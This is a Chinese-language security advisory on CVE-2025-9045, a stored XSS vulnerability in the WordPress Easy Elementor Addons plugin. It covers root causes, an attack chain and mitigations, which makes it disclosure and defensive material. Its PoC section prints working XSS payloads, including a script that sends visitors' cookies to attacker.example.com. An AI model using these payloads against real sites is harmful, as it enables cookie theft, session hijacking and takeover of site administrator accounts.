CVE-2025-9045 WordPress Easy Elementor Addons插件存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-9045

漏洞类型

存储型跨站脚本（Stored XSS）

CVSS评分

6.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

WordPress Easy Elementor Addons插件

漏洞概述

CVE-2025-9045是WordPress平台上一款名为Easy Elementor Addons的插件中存在的存储型跨站脚本（Stored XSS）漏洞。该插件在Elementor页面构建器的基础上提供了多种增强的小组件（widget），被广泛应用于WordPress网站的快速搭建中。

根据漏洞披露信息，该漏洞影响Easy Elementor Addons插件2.2.9及以下所有版本。漏洞的根本原因在于插件中的多个widget参数缺少充分的输入过滤（sanitization）和输出转义（escaping）机制，导致攻击者可以将恶意JavaScript代码作为widget参数值存储到服务器端。当其他用户访问包含恶意代码的页面时，存储在页面中的恶意脚本将在用户浏览器中自动执行。

该漏洞由WordPress安全公司Wordfence的安全团队（[email protected]）发现并披露，CVSS 3.1评分为6.4分，属于中危级别。攻击者需要具备Contributor（投稿者）及以上的WordPress用户权限才能利用此漏洞，因此该漏洞的利用门槛相对较低，在多用户协作的WordPress站点中尤其需要引起重视。漏洞影响范围包括Countdown（倒计时）模块和Image Comparison（图片对比）模块中的多个参数。

技术细节

该存储型XSS漏洞存在于Easy Elementor Addons插件的多个widget中，主要涉及Countdown（倒计时）模块和Image Comparison（图片对比）模块。

从技术层面分析，漏洞产生的原因如下：

1. **输入过滤不足**：插件在处理用户通过Elementor编辑器提交的widget参数时，未对用户输入进行充分的HTML标签过滤和特殊字符转义处理。例如，Countdown模块中的多个参数（位于countdown.php第864、868、871行附近）以及Image Comparison模块中的参数（位于image-comparison.php第376、377行附近）均存在此类问题。

2. **输出转义缺失**：即使部分输入进行了过滤，插件在最终输出widget内容到前端页面时，也未使用WordPress标准函数（如esc_html()、esc_attr()、wp_kses_post()等）进行输出转义，导致恶意脚本能够原样渲染到页面HTML中。

3. **存储型触发机制**：与反射型XSS不同，存储型XSS的恶意载荷会被持久化保存到WordPress数据库中（通常保存在文章或页面的post_meta或post_content中）。每当有用户访问受影响的页面时，恶意脚本都会自动执行，无需用户进行额外的交互操作（UI:N）。

4. **利用条件**：攻击者需要拥有Contributor（投稿者）级别或以上的WordPress账户权限。Contributor级别在WordPress中通常允许用户创建和编辑自己的文章/页面，因此攻击者可以通过正常的文章编辑流程注入恶意widget参数。

5. **影响范围**：由于漏洞范围变更（S:C）的影响，该漏洞可能影响到Elementor编辑过的所有页面，受影响范围较广，可能导致管理员cookie窃取、会话劫持、权限提升、网站内容篡改等多种攻击后果。

攻击链分析

STEP 1

步骤1：获取低权限账户

攻击者通过注册、购买或社会工程学等方式获取目标WordPress站点的Contributor（投稿者）级别或以上的用户账户。

STEP 2

步骤2：创建恶意页面

攻击者使用Elementor页面编辑器创建新页面或编辑现有页面，在页面中添加Countdown（倒计时）或Image Comparison（图片对比）等存在漏洞的widget。

STEP 3

步骤3：注入恶意脚本

攻击者在widget的易受攻击参数中（如标签、标题等字段）输入包含恶意JavaScript代码的payload。由于插件缺少输入过滤和输出转义，恶意代码被原样保存到数据库。

STEP 4

步骤4：发布页面

攻击者将包含恶意widget的页面发布，使其对其他用户（包括管理员）可见。恶意payload被持久化存储在WordPress数据库中。

STEP 5

步骤5：触发执行

当管理员或其他用户访问包含恶意widget的页面时，存储的恶意脚本将在用户浏览器中自动执行，可窃取cookie、会话令牌或执行其他恶意操作。

STEP 6

步骤6：权限提升与持久化

攻击者利用窃取的会话信息以管理员身份登录后台，可进一步植入后门、篡改网站内容或进行其他恶意活动，实现对网站的完全控制。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!--
PoC for CVE-2025-9045: Stored XSS in Easy Elementor Addons Plugin
Affected: Easy Elementor Addons <= 2.2.9
Required: Contributor or higher WordPress user role
-->

<!-- Step 1: Login as Contributor and create/edit a page using Elementor -->
<!-- Step 2: Add the Countdown widget or Image Comparison widget -->
<!-- Step 3: Inject malicious payload into vulnerable widget parameters -->

<!-- Payload example for Countdown widget (inserted into label/title fields): -->
<script>alert('XSS-CVE-2025-9045')</script>

<!-- Or more sophisticated payload for cookie stealing: -->
<script>
var img = new Image();
img.src = 'https://attacker.example.com/steal?cookie=' + document.cookie;
</script>

<!-- Payload example for Image Comparison widget (inserted into caption/label fields): -->
"><img src=x onerror=alert(document.domain)>

<!--
The malicious payload will be stored in the WordPress database as part of
the page metadata. When any user (including administrators) visits the
infected page, the script will execute in their browser context.
-->

<!-- Example of the vulnerable widget shortcode/data stored in DB: -->
{
    "_elementor_data": "[{\"id\":\"abc123\",\"elType\":\"widget\",\"widgetType\":\"countdown\",\"settings\":{\"label_days\":\"<script>alert('XSS')</script>\"}}]"
}

影响范围

Easy Elementor Addons <= 2.2.9

防御指南

临时缓解措施

在无法立即升级插件的情况下，建议采取以下临时缓解措施：1）临时禁用Easy Elementor Addons插件；2）限制Contributor用户角色的创建页面权限；3）部署Web应用防火墙（WAF）规则，过滤包含<script>标签或其他恶意HTML的widget参数；4）启用WordPress的内容安全策略（CSP），限制内联脚本执行；5）定期审查已发布页面中的widget参数，排查可疑内容。